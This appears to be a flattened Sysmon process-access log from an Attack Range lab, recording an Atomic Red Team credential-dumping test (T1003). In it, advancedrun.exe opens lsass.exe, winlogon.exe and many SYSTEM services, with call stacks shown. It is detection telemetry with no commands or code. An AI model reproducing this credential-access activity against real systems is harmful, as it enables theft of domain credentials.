17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942676Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942675Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942674Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942673Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942672Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942671Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942670Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942669Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942668Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942666Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942665Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942664Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942663Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003942662Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942661Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942660Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SY